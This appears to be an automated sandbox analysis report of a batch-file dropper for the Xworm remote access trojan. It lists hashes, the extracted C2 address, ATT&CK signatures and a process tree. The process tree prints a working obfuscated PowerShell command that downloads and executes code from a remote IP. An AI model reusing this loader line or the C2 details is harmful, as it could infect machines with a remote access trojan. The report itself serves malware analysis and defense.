Analysis

  • max time kernel
    92s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/03/2025, 14:01

General

  • Target

    cmd.bat

  • Size

    180B

  • MD5

    b3cede4b5d517877a96f997ef702fb47

  • SHA1

    a4aa92e6231e8ac310b32ecfd6d8f82f3b1c76af

  • SHA256

    450f94a61505838c596764d3e70dce13638ae0086e5695b09264258a859dc42f

  • SHA512

    5d7e73be8121dd8d3374d773d83f1fc553e748ef863a7fc7d914eecae8d1086dcb17dfc14a36ffd00456802af1f708ea19e8c8887203137c6ecf77c7f1239080

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://92.255.57.221/a.mp4

Extracted

Family

xworm

Version

5.0

C2

92.255.57.221:4414

aes.plain

Signatures

  • Detect Xworm Payload 3 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cmd.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:968
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$FC1='ject Net.WebCli';$FC2='loadString(''http://92.255.57.221/a.mp4'')';$FC3='ent).Down';$FC4='(New-Ob';$E5=IEX ($FC4,$FC1,$FC3,$FC2 -Join '')|IEX"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5116
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\i0ccbgwi\i0ccbgwi.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4816
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC5B1.tmp" "c:\Users\Admin\AppData\Local\Temp\i0ccbgwi\CSC41E91395CD4A4BEDAFAD1B73BDEAFD3E.TMP"
          4⤵
            PID:4888
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          3⤵
            PID:940
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
            3⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:4492

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\RESC5B1.tmp

        Filesize

        1KB

        MD5

        0bb13b3b45eacab03762e08565475f8f

        SHA1

        1dd00732754113bf39c6942b98e9ded6093f08d5

        SHA256

        4ade1cf6a7bb5fcc3416f2eeb92b2cf4f18657625ffd654a958f2aa62e825a53

        SHA512

        72ce3d04589df8eeb607911adcee38fb8bbefe9024b3a2b7ea668c9b67f880c5f165821128baf2669c5dc293b398c150e79555ff9d6dd2846734893e75ee5551

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_shq4vrbk.y4i.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\i0ccbgwi\i0ccbgwi.dll

        Filesize

        42KB

        MD5

        980dfece86330e17cc6bbba24d3de88c

        SHA1

        bc8689b616814f556bf2d50f67b7c368b91900b6

        SHA256

        7dee4818abfc77f22a4bceb80a122d4f9c07614f3e5914cd8cf05abbbc9c1159

        SHA512

        e1ddf04396ba4ddc5ea9b189a7e9a2e5b6d10a401444c4c13ba85542864db5dd75a083f80e20cf54a622e90a7b055de5be231b1a5d5fb11e07c03c41f70df018

      • \??\c:\Users\Admin\AppData\Local\Temp\i0ccbgwi\CSC41E91395CD4A4BEDAFAD1B73BDEAFD3E.TMP

        Filesize

        652B

        MD5

        f31455da4afbe4ff9051a67b50d9e960

        SHA1

        3cce84f087b58103108625adc96352e316af42a0

        SHA256

        e27ebca2c0dc6d05211e6b5dfa61cf0513482d89fbeec802218071f57a49e28d

        SHA512

        fabd8b1ffd7940ccbd441b57d6260e4a2437f3a9902c046ce3dcb1f0a1bc2ad6a03c5e73ea49a4c7cb80c574c061cc7d66881bf2fe94c4de3efee50bfe1562f9

      • \??\c:\Users\Admin\AppData\Local\Temp\i0ccbgwi\i0ccbgwi.0.cs

        Filesize

        103KB

        MD5

        992ab26a03ded91714491d267da55fb2

        SHA1

        25fe04d5493f7e904bd4e64078aa464226e8f393

        SHA256

        3b18772dbf088171f78cccd3da6fb05f46918b2bafa17ab43ea03ec0507935c1

        SHA512

        a1dbfd27e02d10e978475bf9c1279c489e1c9febd8456492e2b0d7df33563c4e81cc28e39f6a90aa82cadc06927bce2f831f2089b5e57da4ea89862a6d82ad0f

      • \??\c:\Users\Admin\AppData\Local\Temp\i0ccbgwi\i0ccbgwi.cmdline

        Filesize

        204B

        MD5

        5470ba951cc5815e228a00757800b1f5

        SHA1

        86b6d7953f5fd12d11c725ae3670ab81150a9168

        SHA256

        8cb70dd10c6bb14d7a90faa4fe96b7277e76954b571dc861c8b105a50c82996e

        SHA512

        88ab169ad4ab521d4720aaa55d0ff9a0ab231b3d32a12d83d54a2b956bce6160dfce02538e49f2dab6fb64187c2c97595b6927d140c25d6cb5cfffcf84433007

      • memory/4492-28-0x0000000000400000-0x000000000040E000-memory.dmp

        Filesize

        56KB

      • memory/4492-32-0x0000000004DB0000-0x0000000004E4C000-memory.dmp

        Filesize

        624KB

      • memory/4492-33-0x0000000005470000-0x00000000054D6000-memory.dmp

        Filesize

        408KB

      • memory/4492-34-0x00000000061D0000-0x0000000006262000-memory.dmp

        Filesize

        584KB

      • memory/4492-35-0x0000000006820000-0x0000000006DC4000-memory.dmp

        Filesize

        5.6MB

      • memory/5116-13-0x0000021DF42E0000-0x0000021DF4348000-memory.dmp

        Filesize

        416KB

      • memory/5116-12-0x00007FF8DA960000-0x00007FF8DB421000-memory.dmp

        Filesize

        10.8MB

      • memory/5116-11-0x00007FF8DA960000-0x00007FF8DB421000-memory.dmp

        Filesize

        10.8MB

      • memory/5116-6-0x0000021DF41B0000-0x0000021DF41D2000-memory.dmp

        Filesize

        136KB

      • memory/5116-26-0x0000021DF37C0000-0x0000021DF37D0000-memory.dmp

        Filesize

        64KB

      • memory/5116-0-0x00007FF8DA963000-0x00007FF8DA965000-memory.dmp

        Filesize

        8KB

      • memory/5116-31-0x00007FF8DA960000-0x00007FF8DB421000-memory.dmp

        Filesize

        10.8MB